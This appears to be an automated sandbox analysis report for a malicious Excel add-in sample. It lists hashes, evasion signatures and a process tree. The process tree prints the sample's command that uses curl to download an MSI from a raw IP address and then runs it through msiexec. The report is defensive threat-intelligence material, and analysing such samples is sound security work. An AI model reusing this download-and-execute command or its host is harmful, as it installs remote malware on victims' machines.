Analysis
-
max time kernel
160s -
max time network
170s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
12/10/2023, 07:02
Static task
static1
Behavioral task
behavioral1
Sample
936159194eb4556c0a4e146e9aca2abd458330c921c473e95fffe07fd3a7bc01.xll
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
936159194eb4556c0a4e146e9aca2abd458330c921c473e95fffe07fd3a7bc01.xll
Resource
win10v2004-20230915-en
General
-
Target
936159194eb4556c0a4e146e9aca2abd458330c921c473e95fffe07fd3a7bc01.xll
-
Size
50KB
-
MD5
ecd7149f02821c30e79b67737b2b5e31
-
SHA1
b2a1a29ae4445f6f98851f32b6641a0aaac51a57
-
SHA256
936159194eb4556c0a4e146e9aca2abd458330c921c473e95fffe07fd3a7bc01
-
SHA512
910508e9a26a740710fa4b470d39eafa756bad01e76a31f1c7785e5ba590d33f7a9e33bbdd62dc504e2febd4be75993b2c394d7aaccbc9ce33bf0c7f32212456
-
SSDEEP
1536:uUK23Jsm6Nh5wF3s8KjrtN/5TqRGiNwmU2x0QNY:eCsNh5wF3s8KXHRTviNnAuY
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation me.exe Key value queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 3224 me.exe -
Loads dropped DLL 2 IoCs
pid Process 3516 EXCEL.EXE 3516 EXCEL.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Delays execution with timeout.exe 1 IoCs
pid Process 3860 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3516 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeShutdownPrivilege 3424 msiexec.exe Token: SeIncreaseQuotaPrivilege 3424 msiexec.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 3516 EXCEL.EXE 3516 EXCEL.EXE 3424 msiexec.exe 3424 msiexec.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3516 EXCEL.EXE 3516 EXCEL.EXE 3516 EXCEL.EXE 3516 EXCEL.EXE 3516 EXCEL.EXE 3516 EXCEL.EXE 3516 EXCEL.EXE 3516 EXCEL.EXE 3516 EXCEL.EXE 3516 EXCEL.EXE 3516 EXCEL.EXE 3516 EXCEL.EXE -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 3516 wrote to memory of 3224 3516 EXCEL.EXE 89 PID 3516 wrote to memory of 3224 3516 EXCEL.EXE 89 PID 3224 wrote to memory of 2424 3224 me.exe 93 PID 3224 wrote to memory of 2424 3224 me.exe 93 PID 2424 wrote to memory of 5004 2424 cmd.exe 95 PID 2424 wrote to memory of 5004 2424 cmd.exe 95 PID 2424 wrote to memory of 3860 2424 cmd.exe 97 PID 2424 wrote to memory of 3860 2424 cmd.exe 97 PID 2424 wrote to memory of 3424 2424 cmd.exe 101 PID 2424 wrote to memory of 3424 2424 cmd.exe 101
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\936159194eb4556c0a4e146e9aca2abd458330c921c473e95fffe07fd3a7bc01.xll"1⤵
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3516 -
C:\Users\Public\me.exeC:\Users\Public\me.exe about:"<script>var b = new ActiveXObject("wscript.shell"); b.run('cmd /c C:\\Windows\\system32\\curl.exe -o c:\\users\\public\\1.msi http://94.228.169.123/7qA/123&&timeout 10&&c:\\users\\public\\1.msi', 0); window.close();</script>"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\curl.exe -o c:\users\public\1.msi http://94.228.169.123/7qA/123&&timeout 10&&c:\users\public\1.msi3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\system32\curl.exeC:\Windows\system32\curl.exe -o c:\users\public\1.msi http://94.228.169.123/7qA/1234⤵PID:5004
-
-
C:\Windows\system32\timeout.exetimeout 104⤵
- Delays execution with timeout.exe
PID:3860
-
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\users\public\1.msi"4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3424
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\936159194eb4556c0a4e146e9aca2abd458330c921c473e95fffe07fd3a7bc01.xll
Filesize50KB
MD5ecd7149f02821c30e79b67737b2b5e31
SHA1b2a1a29ae4445f6f98851f32b6641a0aaac51a57
SHA256936159194eb4556c0a4e146e9aca2abd458330c921c473e95fffe07fd3a7bc01
SHA512910508e9a26a740710fa4b470d39eafa756bad01e76a31f1c7785e5ba590d33f7a9e33bbdd62dc504e2febd4be75993b2c394d7aaccbc9ce33bf0c7f32212456
-
C:\Users\Admin\AppData\Local\Temp\936159194eb4556c0a4e146e9aca2abd458330c921c473e95fffe07fd3a7bc01.xll
Filesize50KB
MD5ecd7149f02821c30e79b67737b2b5e31
SHA1b2a1a29ae4445f6f98851f32b6641a0aaac51a57
SHA256936159194eb4556c0a4e146e9aca2abd458330c921c473e95fffe07fd3a7bc01
SHA512910508e9a26a740710fa4b470d39eafa756bad01e76a31f1c7785e5ba590d33f7a9e33bbdd62dc504e2febd4be75993b2c394d7aaccbc9ce33bf0c7f32212456
-
Filesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
Filesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045